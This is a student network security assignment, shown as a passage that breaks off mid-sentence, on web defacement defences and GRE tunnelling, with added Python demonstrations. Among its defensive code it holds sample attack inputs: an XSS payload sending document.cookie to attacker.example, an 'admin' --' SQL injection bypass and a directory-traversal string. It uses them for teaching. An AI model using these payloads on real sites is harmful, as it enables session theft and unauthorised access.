
Network Security Assignment

Course : Network Security

Course code : CT037-3-2-NWS

Due Date : 3rd October 2017

Lecturer : Nor Azlina Binti Abd Rahman

Intake UC2F1701IT(ISS)
Name Boo Ken Hwang (TP044677)
Loh Choon Way (TP041264)
Shahzad Hussain (TP040954)
Abdulaziz Aljawder (TP032807)

Table of Contents
Marking Table
Workload Matrix FOR 4 MEMBERS
Introduction
Individual Part
1.0 Web Defacement (Loh Choon Way TP041264)
1.1 What is web defacement
1.2 How to protect from Web Defacement
1.3 Tools for Protect from Web Defacement
1.4 Method of Web Defacement
1.5 Protect method from DDOS Attack
2.0 Generic Routing Encapsulation (Boo Ken Hwang TP044677)
2.1 What is Generic Routing Encapsulation (GRE)
2.2 OSI Model of 7 Layer
2.3 Advantage and Disadvantage of the GRE
2.4 Difference of the GRE Tunnel
2.5 Vulnerability Problem
2.6 Configuration of Generic Routing Encapsulation
3.0 Android Security (Shahzad Hussain TP040954)
3.1 Introduction of Android
3.2 Android Architecture
3.3 Android Architecture Layers
4.0 Voice over Internet Protocol H.323 (Abdulaziz Aljawder TP032807)
4.1 Introduction of Voice Internet Protocol
4.2 MAIN BODY of Internet Protocol Voice
4.3 Steps of H.323 Call
4.4 VoIP Architecture
4.5 Multipoint Control Unit (MCU)
4.6 Conclusion of VoIP
Group Part
Question 1
Question 2
Question 3
Question 4
Question 5
Question 6
Question 7
Question 8
Question 9
Question 10
Question 11
Question 12
Question 13
Conclusion
Reference

Marking Table

Names and Intakes: Loh Choon Way (TP041264), Boo Ken Hwang (TP044677),
Shahzad Hussain (TP040954), Abdulaziz Aljawder (TP032807)

Criterion                                  Individual (60%)   Group (40%)
Documentation                              10                 10
Referencing                                10                 10
Research and Investigation                 10                 10
Diagram/Figures                            10                 10
Critical Thinking and Applicability        20                 20
Analytical                                 20                 20
Explanation / Configurations               10                 10
Presentations                              10                 10
Grand Total                                100                100

Workload Matrix FOR 4 MEMBERS

Task                                        Loh Choon Way   Shahzad Hussain   Abdulaziz Aljawder   Boo Ken Hwang
                                            (TP041264)      (TP040954)        (TP032807)           (TP044677)
Project Task                                25%             25%               25%                  25%
Project Plan
  Individual Part (Research & References)   0%              100%              0%                   0%
  Group Part (Configuration and Solution)   25%             25%               25%                  25%
Chapter/Sections
  Question 1                                100%            0%                0%                   0%
  Question 2                                25%             25%               25%                  25%
  Question 3                                0%              0%                0%                   100%
  Question 4                                25%             25%               25%                  25%
  Question 5
  Question 6                                0%              0%                100%                 0%
  Question 7                                25%             25%               25%                  25%
  Question 8
  Question 9
  Question 10
  Question 11
  Question 12
  Question 13
Final Documentation

Introduction

Network security is the foundation on which a strong security baseline is built. It requires an
integrated, defence-in-depth approach that combines a variety of methods. Deploying security
solutions can be challenging because of the breadth of functionality available, so the focus of
network security is to protect the network infrastructure itself.

In the given scenario, Company A in Kuala Lumpur has three departments: sales, engineering
and finance (customer workstations). A second sales office is located in Sri Lanka and has 50
employees. All departments connect to an access switch, which in turn connects to the
distribution switch and to the internal interface of the firewall/router. The firewall's external
interface is connected directly to the Internet Service Provider (ISP) router.

The ISP fully manages that router, and Company A has no control over it. The third interface
on the firewall hosts the DMZ, which contains several servers running HTTP/HTTPS, SMTP and
FTP services. The goal of the project is to protect the internal and DMZ hosts from external
threats.

The company has engaged a number of network engineers to design and implement the
solution. Several challenges need to be addressed. Notable ones are: building the network
environment; connecting Company A in Kuala Lumpur with office B in Sri Lanka; securing
Simple Mail Transfer Protocol (SMTP) mail so that only the intended recipients can read a
message; and implementing an intrusion detection system (IDS), a virtual private network
(VPN) and Secure Sockets Layer (SSL).

Individual Part

1.0 Web Defacement (Loh Choon Way TP041264)

1.1 What is web defacement

Web defacement is an attack that changes the visual appearance of a website or web page. The
attacker breaks into the web server and replaces the hosted pages with content of their own.
The most common entry point is SQL injection, which can be used to log in to administrator
accounts; another is obtaining a username and password and uploading the replacement pages
over FTP.

A defacement usually replaces the whole page, and the new page typically carries the defacer's
pseudonym or "hacking codename". Defacers often mock the system administrator for failing to
maintain server security. A defacement is not always harmless: some defacers also upload
malware or delete files from the server. (Banffcyber.com, 2017)

1.2 How to protect from Web Defacement

1. Security audits and penetration testing

Some vulnerabilities are never patched properly, and attackers keep looking for them. A typical
case is a known vulnerability in a network service on the server: an attacker sends a
buffer-overflow payload to an open port and has malicious code executed in the security context
of that service, without ever logging on. Regular security audits and penetration tests are the
most common way to evaluate the security of the IT infrastructure and to uncover weaknesses in
operating systems, improper configurations, and services and applications. (Banffcyber.com,
2017)

2. Defend yourself against SQL injection attacks.

Attackers use SQL injection against the database behind a web application to read existing
data, destroy data or change data. Most websites collect user information through input forms,
and that input is often placed directly into a SQL statement inside the web application.
(Banffcyber.com, 2017)

The following is an example of how an attacker can easily trigger a SQL injection attack.

Figure 1. SQL injection attack

The injection above can be prevented by using bound variables with a prepared statement.

Figure 2. Prevent SQL injection attack

The best defence against SQL injection, however, is to avoid dynamically generated SQL in the
code altogether. In addition, validate input wherever possible. For example:

 Limit input to accepted characters only: e.g. are there letters in a number field?
 Whitelisting: e.g. /[a-zA-Z0-9]{0,20}/, or the set of possible values (if there is one)
 Length checks: e.g. are there 10 digits in a 4-digit year field?
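The following is an added example (not the report's Figure 1 or Figure 2) of the injection just described and of the two defences: a prepared statement with bound variables, and a whitelist plus length check in front of it. The in-memory SQLite table and the `admin' --` payload are constructed for the demonstration; a real site would store password hashes rather than plaintext, which is irrelevant to the injection itself.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the site's user table (plaintext passwords only
    # to keep the injection visible; a real application stores hashes).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "S3cret!", "administrator"),
        ("alice", "wonderland", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    # The form input is concatenated into the statement, so input becomes SQL.
    # With username "admin' --" the rest of the WHERE clause is commented out.
    query = ("SELECT role FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_prepared(conn, username, password):
    # Bound variables: the driver passes the values separately from the SQL
    # text, so quotes and comment markers in the input are just data.
    row = conn.execute(
        "SELECT role FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


# Whitelist from the list above: letters and digits only, at most 20 characters.
USERNAME_RE = re.compile(r"^[a-zA-Z0-9]{1,20}$")


def login_hardened(conn, username, password):
    # Input validation first (reject anything outside the whitelist), then the
    # prepared statement as the real defence.
    if not USERNAME_RE.match(username):
        return None
    return login_prepared(conn, username, password)


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' --"
    print("vulnerable:", login_vulnerable(conn, payload, "anything"))   # administrator
    print("prepared:  ", login_prepared(conn, payload, "anything"))     # None
    print("hardened:  ", login_hardened(conn, payload, "anything"))     # None
```

The vulnerable function grants the administrator role to anyone who knows the payload; the same input against the prepared statement simply fails to match a user.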
3. Defend yourself against Cross-Site-Scripting (XSS) attacks.

Cross-site scripting (XSS) is an attack in which the attacker uses a web form (or other input) to
pass script code into the web application so that it runs, unauthorised, in the browsers of other
users. With it, an attacker can change the appearance of the site, steal the session cookies of
other users of the website, or use the site to attack its visitors. To prevent XSS, the web
application must stop user-supplied input from being injected into the page as code.
(Banffcyber.com, 2017)

One of the best practices for preventing cross-site scripting is to properly encode output.

Encode HTML output

 if the data came from user input, a database or a file
 not 100% effective, but prevents most vulnerabilities

Encode URL output

 if returning URL strings

The most common XSS attack is cookie theft: the attacker injects malicious code that sends
every visitor's cookies to the attacker. Cookie theft can be prevented by marking cookies
HttpOnly. The browser then refuses to expose such cookies to JavaScript through
document.cookie, while still sending them with HTTP requests, so an XSS payload cannot read
them. Another preventive measure is a Web Application Firewall (WAF), which can check for
malicious input values and modification of read-only parameters, filter malicious output and
block suspicious requests. (Banffcyber.com, 2017)
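As an added example (not from the original report or from Banff Cyber), the snippet below shows the three controls just listed in working code: the reflected comment with and without HTML output encoding, URL encoding of a value placed in a link, and a Set-Cookie header carrying the HttpOnly and Secure flags. The comment payload and cookie value are constructed; `render_comment_*`, `build_search_link` and `session_cookie_header` are illustrative names.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import quote


def render_comment_vulnerable(comment):
    # Reflects the user's text straight into the page: a <script> tag will run
    # in every visitor's browser.
    return '<div class="comment">' + comment + '</div>'


def render_comment_encoded(comment):
    # HTML-encode output regardless of whether it came from a form, the database
    # or a file; < > & " ' become entities and can no longer open a tag.
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def build_search_link(term):
    # URL-encode a value placed inside a URL, then HTML-encode the whole
    # attribute value when it is written into the page.
    url = "/search?q=" + quote(term, safe="")
    return '<a href="' + html.escape(url, quote=True) + '">search</a>'


def session_cookie_header(session_id, secure=True):
    # HttpOnly keeps the cookie out of document.cookie (defeats XSS cookie theft);
    # Secure keeps it off plain HTTP. Returns the Set-Cookie header value.
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = secure
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    # Constructed cookie-stealing payload of the kind described above.
    payload = "<script>location='http://attacker.example/?c='+document.cookie</script>"
    print(render_comment_vulnerable(payload))
    print(render_comment_encoded(payload))
    print(build_search_link('"><script>alert(1)</script>'))
    print("Set-Cookie:", session_cookie_header("abc123"))
```

Output encoding neutralises the payload in the page; the HttpOnly flag is the second layer, so that even a script that does get through cannot read the session cookie.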

4. Prepare to respond to defacement incidents.

Detection tools only tell you that the website has been defaced; they do not take any action. To
stay secure, the defaced site should be taken offline and investigation and forensics should
follow, because the attacker may have gone deeper into the organisation to reach the server or
database.
In addition, an organisation can use Banff Cyber's WebOrion Restorer, which creates a secured
replica of the website; the replica does not carry over the vulnerabilities of the defaced server.
(Banffcyber.com, 2017)

1.3 Tools for Protect from Web Defacement

1. Change Detection

ChangeDetection is a free service that sends a daily, weekly or monthly notification whenever
text on a configured web page is added or removed. (Kumar et al., 2017)

2. Status Cake

StatusCake is another free service. It is configured with a string expected on the page and
alerts only when the page no longer matches. Under a single monitor StatusCake lets you
configure: (Kumar et al., 2017)

 how frequently (30/60 seconds, 15/30/60 minutes or daily) the web page should be
checked
 how soon (0-60 minutes) an alert is triggered after the first downtime is detected
 blacklist monitoring
 which HTTP status codes should trigger an alert
 crawl timeout
 a maintenance window, so that no alerts are sent during known downtime

3. IPVTec

IPVTec is an online service that alerts by email or SMS when the website is defaced. It also
monitors for: (Kumar et al., 2017)

 SSL certificate expiry
 website not available
 hijacking
 blacklisting
 malware

4. SUCURI

SUCURI offers malware scanning and security monitoring as a service, and supports many
platforms such as WordPress, phpBB and others. It detects: (Kumar et al., 2017)

 hidden malicious iFrames
 conditional redirects
 anomalous injections
 missing website-hardening best practices
 obfuscated JavaScript infections

5. Site 24x7

Site24x7 provides end-to-end application and server monitoring, including defacement
detection. Its strength is that many combinations of checks can be configured to protect the
website from defacement. (Kumar et al., 2017)
6. Visualping

Visualping lets you select part of a web page to monitor and alerts when that area changes, so
the alert can be focused on the page's important regions. (Kumar et al., 2017)

7. OnWebChange

OnWebChange can watch multiple areas of a web page and can also monitor files such as
PDFs, videos and images. It notifies by email, Pushover, Teamstinct or HTTP callback. (Kumar
et al., 2017)
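All of the services above work on the same principle: fingerprint the page (or a selected region of it, as Visualping and OnWebChange do) and alert when the fingerprint changes. The block below is an added example of that logic, not code from any of the products or from the original report. The three HTML pages are constructed: a baseline, a copy where only the footer date changed, and a defaced copy. Monitoring only the `main` region means routine footer updates do not raise alerts while a defacement of the body does.

```python
import hashlib
import re

# Constructed pages, not real sites.
BASELINE_HTML = """<html><body>
<div id="main"><h1>Company A</h1><p>Welcome to our site.</p></div>
<div id="footer">Last updated: 2017-09-30</div>
</body></html>"""

FOOTER_CHANGED_HTML = BASELINE_HTML.replace("2017-09-30", "2017-10-01")

DEFACED_HTML = BASELINE_HTML.replace(
    "<p>Welcome to our site.</p>", "<p>Hacked by h4x0r</p>")


def extract_region(html_text, element_id):
    # Inner HTML of the <div id="..."> being watched (enough for this demo;
    # a production monitor would use a real HTML parser).
    m = re.search(r'<div id="%s">(.*?)</div>' % re.escape(element_id),
                  html_text, re.S)
    return m.group(1) if m else ""


def text_only(fragment):
    # Drop tags and collapse whitespace so cosmetic markup changes do not alert.
    return re.sub(r"\s+", " ", re.sub(r"<[^>]+>", " ", fragment)).strip()


def fingerprint(html_text, element_id="main"):
    # SHA-256 over the visible text of the watched region.
    text = text_only(extract_region(html_text, element_id))
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def check(baseline_fp, current_html, element_id="main"):
    # One monitoring run: returns (changed, current_fingerprint). The caller
    # raises the alert (email, SMS, HTTP callback) when changed is True.
    current_fp = fingerprint(current_html, element_id)
    return current_fp != baseline_fp, current_fp


if __name__ == "__main__":
    baseline = fingerprint(BASELINE_HTML)
    for name, page in [("footer update", FOOTER_CHANGED_HTML),
                       ("defacement", DEFACED_HTML)]:
        changed, _ = check(baseline, page)
        print("%-14s -> %s" % (name, "ALERT: page changed" if changed else "no change"))
```

The baseline fingerprint must be stored somewhere the attacker cannot reach (not on the web server itself), otherwise a defacer who gains write access can simply re-baseline the monitor.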
1.4 Method of Web Defacement

1. SQL Injection

SQL injection is an exploit of a weakness in the way an application builds SQL statements: the
attacker supplies input through a web form, or manipulates SQL parameters in the URL, so that
the input is interpreted as SQL commands and executed. A second-order variant inserts
malicious text into a string that is stored in a table; that text executes only later, when the
stored string is concatenated into a dynamic SQL command. (Learn Ethical Hacking and
Penetration Testing Online, 2016)

2. Cross Site Scripting

Cross-site scripting (XSS) occurs when a user can input malicious code into a website and the
application delivers that code to other users, forcing the application to do something it was not
intended to do. XSS has featured in well-known attacks on large organisations such as the FBI,
Apple and Facebook. (Learn Ethical Hacking and Penetration Testing Online, 2016) Website
features commonly vulnerable to XSS attacks are:

• search engines
• login forms
• comment fields

3. Remote File Inclusion

Remote File Inclusion (RFI) is found on many websites. The attacker makes the application
include a file from a remote server, so server-side commands execute with the privileges of the
web server, giving the attacker access to files on the server. With that access the attacker can
take over the whole website. (Learn Ethical Hacking and Penetration Testing Online, 2016)
RFI can lead to:

• code execution on the web server
• code execution on the client side, such as JavaScript, which can lead to other attacks
such as cross-site scripting (XSS)
• denial of service (DoS)
• data theft/manipulation

4. Local File Inclusion

Local File Inclusion (LFI) gives the attacker the ability to read files on the server by means of
directory traversal. A common LFI target is the password file, which on a Linux system contains
user account information. LFI is quite similar to RFI. (Learn Ethical Hacking and Penetration
Testing Online, 2016)

5. DDOS Attack

A distributed denial-of-service (DDoS) attack shuts a website down so that users cannot view it.
A site under DDoS is unavailable temporarily or indefinitely, because its bandwidth and
resources are exhausted and no longer available to legitimate users. (Learn Ethical Hacking
and Penetration Testing Online, 2016)
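The directory traversal behind LFI, and the check that stops it, as an added example that is not part of the original report. The PHP `include` the attack usually targets is stood in for by a Python page loader; the template directory, the `home.html` page and the `secret/passwd` file (a constructed stand-in for the Linux password file) are all created in a temporary directory so the example runs offline.

```python
import os
import tempfile


def build_sandbox():
    # Constructed layout: <root>/templates/home.html is the only file the page
    # loader should ever serve; <root>/secret/passwd stands in for /etc/passwd.
    root = tempfile.mkdtemp()
    templates = os.path.join(root, "templates")
    os.makedirs(templates)
    os.makedirs(os.path.join(root, "secret"))
    with open(os.path.join(templates, "home.html"), "w") as f:
        f.write("<h1>home</h1>")
    with open(os.path.join(root, "secret", "passwd"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed sample line
    return templates


def read_page_vulnerable(template_dir, name):
    # The request parameter is joined straight onto the directory: "../" walks out
    # of it, which is exactly the LFI / directory traversal described above.
    with open(os.path.join(template_dir, name)) as f:
        return f.read()


def read_page_hardened(template_dir, name):
    # Resolve the final path (symlinks and ".." included) and confirm it is still
    # under the template directory before opening it.
    base = os.path.realpath(template_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the template directory: %r" % name)
    with open(target) as f:
        return f.read()


if __name__ == "__main__":
    templates = build_sandbox()
    print("vulnerable:", read_page_vulnerable(templates, "../secret/passwd").strip())
    print("hardened:  ", read_page_hardened(templates, "home.html"))
    try:
        read_page_hardened(templates, "../secret/passwd")
    except PermissionError as exc:
        print("hardened:  ", exc)
```

An allowlist of page names is an even tighter control when the set of includable files is known; the realpath check above is the general defence when it is not.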

1.5 Protect method from DDOS Attack

1. Do It Yourself

Some programmers write Python scripts to filter out bad traffic, and some use the existing
firewall to block it. Because today's DDoS attacks are so large and varied, these methods often
stop working once the attack volume is too high. (Sean Leach, 2013)

2. Specialized On-Premises Equipment

This is similar to the do-it-yourself approach, but the company purchases and deploys
dedicated DDoS mitigation appliances. These purpose-built devices sit in front of the servers
and routers and detect and filter malicious traffic.

Some consider the devices wasteful: staff must be on hand to operate them, they do nothing
until the server is actually attacked, and hiring professional security engineers to run them is
expensive. Their main disadvantage, however, is that they cannot handle very high-volume
attacks. (Sean Leach, 2013)

3. Internet Service Provider (ISP)

Some companies have their ISP provide DDoS mitigation. An ISP has far more bandwidth than
most companies and can absorb high-volume attacks, but there are three key problems with the
service: (Sean Leach, 2013)

 lack of core competency
 single-provider protection
 no cloud protection
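The "do it yourself" script mentioned in option 1, as an added example (not from the original report or from Sean Leach): a sliding-window counter per source address over web-server access-log lines, producing the firewall rules that would block the offenders. The log lines are constructed, in a simplified `<epoch seconds> <client ip> <path>` format. The limitation the text describes is visible in the design: this works for an application-layer flood from a handful of sources and does nothing against a volumetric attack that saturates the link before the web server sees a request.

```python
from collections import defaultdict, deque

# Constructed access log: one normal visitor, one source hammering /login at
# 10 requests per second, and one visitor with a handful of requests.
SAMPLE_LOG = (
    ["%d 203.0.113.7 /index.html" % (1000 + i) for i in range(0, 60, 6)] +
    ["%d 198.51.100.9 /login" % (1000 + i // 10) for i in range(200)] +
    ["%d 192.0.2.33 /about.html" % (1005 + i) for i in range(5)]
)


def find_flooders(lines, window=10, limit=50):
    # Flag a source once more than `limit` of its requests fall inside any
    # `window`-second span. Returns {ip: timestamp at which it was flagged}.
    events = sorted((int(ts), ip) for ts, ip, _path in (line.split() for line in lines))
    recent = defaultdict(deque)   # per-IP timestamps inside the current window
    flagged = {}
    for ts, ip in events:
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] >= window:
            q.popleft()
        if len(q) > limit and ip not in flagged:
            flagged[ip] = ts
    return flagged


def block_commands(flagged):
    # iptables rules an operator would apply for the flagged sources
    # (returned as strings; nothing is executed here).
    return ["iptables -I INPUT -s %s -j DROP" % ip for ip in sorted(flagged)]


if __name__ == "__main__":
    offenders = find_flooders(SAMPLE_LOG)
    for ip, ts in offenders.items():
        print("flagged %s at t=%d" % (ip, ts))
    for cmd in block_commands(offenders):
        print(cmd)
```

Thresholds need tuning per site: a NAT gateway in front of an office legitimately produces many requests from one address, which is why real mitigation also looks at request patterns rather than counts alone.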

2.0 Generic Routing Encapsulation (Boo Ken Hwang TP044677)


2.1 What is Generic Routing Encapsulation (GRE)

Generic Routing Encapsulation (GRE) is an encapsulation mechanism that wraps packets of one
protocol so that they can be carried over another protocol, typically straight across an IP
network.

Generic Routing Encapsulation was created by Cisco. It is a tunnelling mechanism that carries
data packets from router to router. A GRE tunnel is a private one-to-one (point-to-point) link
between two networks, similar in concept to the private communication a Virtual Private
Network (VPN) provides. For example, a router sends an encapsulated packet over the Internet,
and the Internet delivers it to the far-end router; this path is called a GRE tunnel. Its purpose is
to carry the packet to the other router across the Internet. GRE encapsulates layer 3 of the OSI
model, the network layer protocol. [GRE08]

2.2 OSI Model of 7 Layer

OSI is a reference model that defines network protocols in layers, each with a different function.
There are 7 layers: Physical, Data Link, Network, Transport, Session, Presentation and
Application. A GRE tunnel operates at the network layer: the router encapsulates the IP packet
and transports it across the Internet, giving the two ends a connection for transmitting data
much like a VPN. GRE itself rides directly on IP (IP protocol number 47), so it is sometimes
treated as a transport-layer protocol even though its payload is a network-layer packet. [Bea17]
Figure 1: GRE Encapsulation Packet of function [Tro17]

GRE encapsulates network-layer protocols inside IP packets. The original specification is RFC
1701 and RFC 1702 (GRE over IPv4); the current standard is RFC 2784, which defines how
payloads, IPv4 or IPv6, are encapsulated in IPv4 packets. IPv4 address space is exhausted, and
IPv6 continues from IPv4 with a much larger address space. [ali17]

GRE works by carrying the inner packet as the payload of an outer packet, so that the inner
packet crosses the Internet unchanged. This lets the GRE tunnel deliver the packet from one
router to the other. Intermediate routers see only the outer header and do not examine the inner
IP information; when the packet reaches the tunnel endpoint, the outer packet is removed and
the inner packet is forwarded. The benefit is that the inner addressing is not exposed to the
public network's routing, so the two routers can exchange traffic for private address ranges over
a shared link. GRE does not encrypt, however, so the inner packet is still readable by anyone on
the path. [Mar11]

A GRE tunnel provides a virtual interface through which devices send the packets. An
encapsulated GRE packet has four parts: the delivery header (IPv4), the GRE header, the
payload header (IPv4/IPv6) and the payload. [GRE17]

Part of the encapsulated packet and its function:

Delivery header: the outer (encapsulating) packet header. An IPv4 delivery header carries IP
protocol number 47, which tells the receiver that a GRE header follows.

GRE header: sits between the delivery header and the payload header. It holds the GRE version
and the protocol type of the payload, and may also carry an optional checksum, tunnel key and
sequence number.

Payload header: the inner (encapsulated) packet header, i.e. the IPv4 or IPv6 header of the
carried packet.

Payload: the user data carried inside the packet.

Example of the GRE Encapsulation Packet Process:

Figure 2: GRE Encapsulation Packet Process [adm11]

A GRE tunnel can carry many types of packet and protocol. The example below shows
encapsulation and de-encapsulation on a switch. [JUN12]

Encapsulation process

- The switch receives a payload packet that it must send out through the GRE tunnel interface.

- The tunnel interface encapsulates the packet in a GRE packet, and the system then
encapsulates the GRE packet in an IP packet.

- The IP packet is routed to its destination address, the far tunnel endpoint.

De-encapsulation process
- When the IP packet reaches the destination, the switch checks that the destination address is
its own.

- The IP header is removed and the packet is handed to the GRE protocol.

- GRE strips the GRE header and forwards the inner packet towards its final destination.
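The four-part packet format and the encapsulation / de-encapsulation steps above, carried out on real bytes. This is an added example, not code from the original report or from any vendor: it builds an RFC 2784 GRE packet (delivery IPv4 header with protocol 47, a GRE header with the optional checksum, and an inner IPv4 packet as payload) and then reverses the three de-encapsulation steps. The addresses and the `hello` payload are constructed; the last line of the demo shows the security point made later in this section, that the inner data is carried in the clear.

```python
import struct

GRE_PROTO = 47              # IP protocol number: "a GRE header follows"
ETHERTYPE_IPV4 = 0x0800     # GRE protocol type for an IPv4 payload
GRE_FLAG_CHECKSUM = 0x8000  # C bit in the first 16 bits of the GRE header (RFC 2784)


def ones_complement_checksum(data):
    # Internet checksum used by the IPv4 header and by GRE when the C bit is set.
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_bytes(addr):
    return bytes(int(octet) for octet in addr.split("."))


def ipv4_header(src, dst, proto, payload_len, ttl=64):
    # Minimal 20-byte IPv4 header (no options) with a correct header checksum.
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, ttl,
                      proto, 0, ip_bytes(src), ip_bytes(dst))
    csum = ones_complement_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]


def gre_encapsulate(outer_src, outer_dst, inner_packet, with_checksum=True):
    # Delivery header (IPv4, protocol 47) + GRE header + payload (the inner packet).
    flags_ver = GRE_FLAG_CHECKSUM if with_checksum else 0   # version bits = 0
    gre = struct.pack("!HH", flags_ver, ETHERTYPE_IPV4)
    if with_checksum:
        # Checksum covers GRE header and payload with the checksum field zeroed.
        csum = ones_complement_checksum(gre + struct.pack("!HH", 0, 0) + inner_packet)
        gre += struct.pack("!HH", csum, 0)   # checksum, reserved1
    delivery = ipv4_header(outer_src, outer_dst, GRE_PROTO, len(gre) + len(inner_packet))
    return delivery + gre + inner_packet


def gre_decapsulate(packet, my_address):
    # The three de-encapsulation steps: confirm destination, strip IP, strip GRE.
    ihl = (packet[0] & 0x0F) * 4
    dst = ".".join(str(b) for b in packet[16:20])
    if dst != my_address:
        raise ValueError("packet is not addressed to this tunnel endpoint")
    if packet[9] != GRE_PROTO:
        raise ValueError("delivery header does not carry GRE (protocol 47)")
    gre = packet[ihl:]
    flags_ver, proto_type = struct.unpack("!HH", gre[:4])
    if flags_ver & 0x0007:
        raise ValueError("only GRE version 0 is handled here")
    hdr_len = 4
    if flags_ver & GRE_FLAG_CHECKSUM:
        # With a valid checksum the one's-complement sum over header+payload is zero.
        if ones_complement_checksum(gre) != 0:
            raise ValueError("GRE checksum mismatch")
        hdr_len += 4
    return proto_type, gre[hdr_len:]


def build_demo():
    # Constructed example: a private-address packet (10.1.1.1 -> 10.2.2.2, IP protocol
    # 253, reserved for experimentation) tunnelled between two public endpoints.
    inner = ipv4_header("10.1.1.1", "10.2.2.2", 253, 5) + b"hello"
    outer = gre_encapsulate("203.0.113.1", "198.51.100.1", inner)
    return inner, outer


if __name__ == "__main__":
    inner, outer = build_demo()
    print("outer length %d, delivery protocol %d" % (len(outer), outer[9]))
    proto_type, payload = gre_decapsulate(outer, "198.51.100.1")
    print("payload type 0x%04x, inner intact: %s" % (proto_type, payload == inner))
    print("plaintext visible in tunnel packet:", b"hello" in outer)   # no encryption
```

The checksum only detects accidental corruption; it is not a security control. Anyone on the path can read the inner packet, or rebuild one with a valid checksum, which is why the section below pairs GRE with IPsec.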

2.3 Advantage and Disadvantage of the GRE


[Con17]

Advantage

- Generic Routing Encapsulation can carry multiple protocols inside one GRE tunnel.

- A GRE tunnel lets users send many types of traffic from one destination to another.

- GRE is easy to use, and its command-line configuration is easy to learn.

Disadvantage

- GRE encapsulates the inner packet but does not secure the payload; IPsec (the ESP
feature) must be added, otherwise the packet is not fully protected.

- GRE provides no encryption or authentication; IPsec provides those features and makes
the GRE tunnel secure.

- A GRE tunnel creates a point-to-point connection like a VPN, but with less security.

2.4 Difference of the GRE Tunnel

GRE vs IP-in-IP [X4B17]

A GRE tunnel carries the payload packet to the tunnel endpoint; there the GRE and delivery
headers are removed and the payload continues to its final destination.

GRE Tunnel advantages:

- A single backbone protocol can carry multiple protocols inside the GRE tunnel.

- The tunnel can work around hop-count limits in the network.

- GRE tunnels connect discrete subnets.

- VPNs over a wide area network are possible.

- Better support for devices and systems that cannot handle IP-in-IP packets.

- The tunnel can carry packets with optional header fields (key, sequence number), which is
useful for some UDP applications.

Security features

GRE can carry an optional tunnel key that identifies the tunnel and separates its traffic from
other tunnels between the same endpoints. It is a 32-bit identifier, not an encryption key, and it
provides no confidentiality.

IP-in-IP has a similar function to GRE: it is also an encapsulation protocol, but a simpler one.
An IP packet is encapsulated directly inside another IP header. The difference from GRE is that
an IP-in-IP tunnel cannot carry multiple protocols.

IP-in-IP has some advantages over a GRE tunnel:

- Lower overhead, because the encapsulation layer is smaller (no GRE header).

- Simpler encapsulation of IP packets, supported on devices that do not support GRE.

- A single tunnel between two endpoints.

GRE vs IPsec [GRE13]

GRE and IPsec differ in their security features. GRE only adds a GRE header, so the tunnel
protects nothing beyond the outer encapsulation. When an IP packet travels from one network to
another inside a GRE tunnel, intermediate routers cannot analyse or process it as an ordinary IP
packet.

GRE is simple to configure and easy for users to learn. A packet sent into the GRE tunnel is
routed to the tunnel interface and wrapped into a new packet.

IPsec is the protocol that solves the GRE tunnel's security problems. GRE wraps the outer
layer, and IPsec can be combined with GRE to protect the inner protocol: it encrypts and
authenticates the encapsulated packet so that an unauthorised party cannot read or tamper with
the GRE traffic. Combining the two is more secure than GRE alone.

For example, a GRE packet can be protected with Encapsulating Security Payload (ESP), which
provides confidentiality and integrity for the tunnelled packet. GRE provides a VPN-style tunnel
but no encryption, and several security threats can affect a plain GRE tunnel. IPsec, by contrast,
is a full protocol suite for encryption and authentication.

The difference is that GRE processes data faster than IPsec because it performs no encryption,
whereas IPsec transforms each packet, and encrypting and decrypting takes time. IPsec
encapsulates the payload, i.e. the user data or inner packet. IPsec alone cannot carry multiple
protocols the way a GRE tunnel can, but it provides security for the tunnelled traffic.

Example of GRE Tunnel with IPsec encryption

Figure 3: [Enc17]
The diagram uses three routers and a GRE tunnel; the configuration then adds encryption to
protect the packets.

2.5 Vulnerability Problem


[Cis17]

Cisco published an advisory about a decapsulation vulnerability in its GRE implementation (the
report refers to it as GRE version 1.0). The advisory lists three bugs in GRE decapsulation that
the developers acknowledged once the problem was understood; the bugs can stop GRE from
functioning. The issue was reported to Cisco by a researcher from Phenoelit.

The affected product is Cisco IOS Software, in the 12.0, 12.1 and 12.2 release trains. On
affected releases the GRE functionality between two tunnel endpoints can be broken. Some
releases are not affected and can be used as usual.

Cisco provided a workaround showing users how to mitigate the problem, which involves
debugging the tunnel so that the GRE tunnel functions again, and released fixed software so that
the problem does not recur. The advisory dates from 2006. It also points users to web pages with
more information and invites feedback from users.

Limitation of GRE Tunnel [Con171]

 Cisco NX-OS supports the GRE header format of RFC 2784; the RFC 1701 format is not
supported by Cisco NX-OS.
 Both ends of the tunnel must be in the same VRF; otherwise data cannot be transmitted
through the GRE tunnel.
 GRE tunnels on this platform do not support multicast.
2.6 Configuration of Generic Routing Encapsulation
[Aru16]

Figure 4: Example of Configuration of GRE Tunnel

Example of the GRE tunnel configuration commands in Cisco Packet Tracer:

Figure 5: Configuration of Router 1

The first step configures Router 1 for the GRE tunnel connection: create the tunnel interface,
assign its IP address, and set the tunnel source and destination so the tunnel knows the far
endpoint.
Figure 6: Configuration of Router 2

The second step configures Router 2 in the same way, assigning the IP address and creating the
